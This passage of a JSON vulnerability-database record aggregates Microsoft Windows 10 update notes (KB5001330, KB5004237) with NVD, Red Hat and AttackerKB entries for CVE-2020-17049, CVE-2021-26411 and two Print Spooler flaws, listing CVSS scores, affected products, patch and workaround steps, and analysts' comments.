5001330](<https://download.microsoft.com/download/e/3/b/e3b48b01-ec2d-4e51-9ea8-b4b0b8e1a207/5001330.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.925 and 19042.925](<https://download.microsoft.com/download/5/a/5/5a5efb3d-9d22-4add-bac0-34959549170f/SSU_version_19041.925.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mskb", "title": "April 13, 2021\u2014KB5001330 (OS Builds 19041.928 and 19042.928)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1036", "CVE-2020-17049", "CVE-2021-27092", "CVE-2021-28319"], "modified": "2021-04-13T07:00:00", "id": "KB5001330", "href": "https://support.microsoft.com/en-us/help/5001330", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:10", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates for verifying usernames and passwords.\n * Updates to improve security when Windows performs basic operations.\n * Updates an issue that might make printing to certain printers difficult. This issue affects various brands and models, but primarily receipt or label printers that connect using a USB port. After installing this update, you do not need to use a Known Issue Rollback (KIR) or a special Group Policy to resolve this issue[. ](<>)\n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n## \n\n__\n\nWindows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1157) released July 13, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that might make printing to certain printers difficult. This issue affects various brands and models, but primarily receipt or label printers that connect using a USB port. After installing this update, you do not need to use a Known Issue Rollback (KIR) or a special Group Policy to resolve this issue.\n * Removes support for the PerformTicketSignature setting and permanently enables Enforcement mode for CVE-2020-17049. For more information and steps to enable full protection on domain controller servers, see [Managing deployment of Kerberos S4U changes for CVE-2020-17049](<https://support.microsoft.com/en-us/topic/kb4598347-managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049-569d60b7-3267-e2b0-7d9b-e46d770332ab>).\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33757>). For more information, see KB5004605.\n * Addresses a vulnerability in which Primary Refresh Tokens are not strongly encrypted. This issue might allow the tokens to be reused until the token expires or is renewed. For more information about this issue, see [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>).\n * Security updates to Windows Apps, Windows Management, Windows Fundamentals, Windows Authentication, Windows User Account Control (UAC), Operating System Security, Windows Virtualization, Windows Linux, the Windows Kernel, the Microsoft Scripting Engine, the Windows HTML Platforms, the Windows MSHTML Platform, and Windows Graphics.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n## \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>) might fail to print when using smart card (PIV) authentication.| For more information, see KB5005408. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004237>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004237](<https://download.microsoft.com/download/6/5/2/65245c79-00e2-4474-885c-6cb7dcc68fe7/5004237.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/c/0/f/c0febc6b-065c-420f-bb68-737a971753ec/SSU_version_19041_1110.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004237 (OS Builds 19041.1110, 19042.1110, and 19043.1110)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-33779", "CVE-2021-34476"], "modified": "2021-07-13T07:00:00", "id": "KB5004237", "href": "https://support.microsoft.com/en-us/help/5004237", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:31:25", "description": "Kerberos Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-11T07:15:00", "type": "cve", "title": "CVE-2020-17049", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049"], "modified": "2021-11-30T22:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:*", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17049", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17049", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-04T15:47:08", "description": "Internet Explorer Memory Corruption Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T16:15:00", "type": "cve", "title": "CVE-2021-26411", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2021-26411", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26411", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:56:18", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26878.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T16:15:00", "type": "cve", "title": "CVE-2021-1640", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26878"], "modified": "2021-05-04T14:03:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2021-1640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1640", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-05-04T15:47:02", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1640.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T16:15:00", "type": "cve", "title": "CVE-2021-26878", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26878"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-26878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26878", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2022-07-07T17:35:30", "description": "It was found that the Kerberos Key Distribution Center (KDC) delegation feature, Service for User (S4U), did not sufficiently protect the tickets it's providing from tempering. A malicious, authenticated service principal allowed to delegate could use this flaw to impersonate a non-forwardable user.\n#### Mitigation\n\nIn Red Hat Identity Management (IdM), the list of existing rules for service principals delegation can be obtained with the following commands : \n$ ipa servicedelegationrule-find \n$ ipa servicedelegationtarget-find \nThe services allowed to delegate must all be trusted. \nBy default, only HTTP/<IPA host>@<REALM>, corresponding to IdM's Web UI, is allowed to delegate. \n\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T20:20:39", "type": "redhatcve", "title": "CVE-2020-17049", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049"], "modified": "2022-07-07T12:52:36", "id": "RH:CVE-2020-17049", "href": "https://access.redhat.com/security/cve/cve-2020-17049", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-11-10T17:17:06", "description": "Kerberos Security Feature Bypass Vulnerability\n\n \n**Recent assessments:** \n \n**jakekarnes42** at December 09, 2020 12:26am UTC reported:\n\nTechnical analysis and exploit of the vulnerability are now publicly available: \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-overview/> \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/> \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/>\n\n**SusanBradley** at November 23, 2020 3:37am UTC reported:\n\nTechnical analysis and exploit of the vulnerability are now publicly available: \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-overview/> \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/> \n<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17049", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049"], "modified": "2020-11-24T00:00:00", "id": "AKB:D354FE9E-B72A-4328-93DD-28578E160D9B", "href": "https://attackerkb.com/topics/dx20vE1m2v/cve-2020-17049", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T23:37:00", "description": "Internet Explorer Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 11, 2021 5:57pm UTC reported:\n\nUpdate: This is now reported as having been exploited in the wild by North Korean APT actors along with CVE-2020-1380 as noted at <https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>\n\nReported as exploited in the wild at <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>. Appears to be a memory corruption bug in Internet Explorer and Edge which would allow for a watering hole or drive by attack whereby a user is convinced to visit an attacker\u2019s malicious website and then the attacker would be able to gain RCE on the user\u2019s computer. Interestingly, despite this being a memory corruption bug, which is typically harder to exploit, Microsoft has still written up the exploitability of this vulnerability as Low.\n\nThere also appears to be an analysis of this vulnerability at <https://enki.co.kr/blog/2021/02/04/ie_0day.html> which suggests that this was the vulnerability used by the Laurus APT group to attack security researchers in Feburary. An English summary can be found at <https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/> which suggests that this vulnerability was a double free vulnerability in IE which was triggered by sending a user a malicious MHT/MHTML file, and if the user allowed script execution, then CVE-2021-26411 would be exploited.\n\nGiven that Mitja Kolsek of 0Patch was able to replicate this issue relatively quickly, I\u2019d say its likely that attackers will be able to exploit this vulnerability as well. I would expect to see more widespread exploitation of this vulnerability in the coming months.\n\n**ccondon-r7** at April 05, 2021 1:20pm UTC reported:\n\nUpdate: 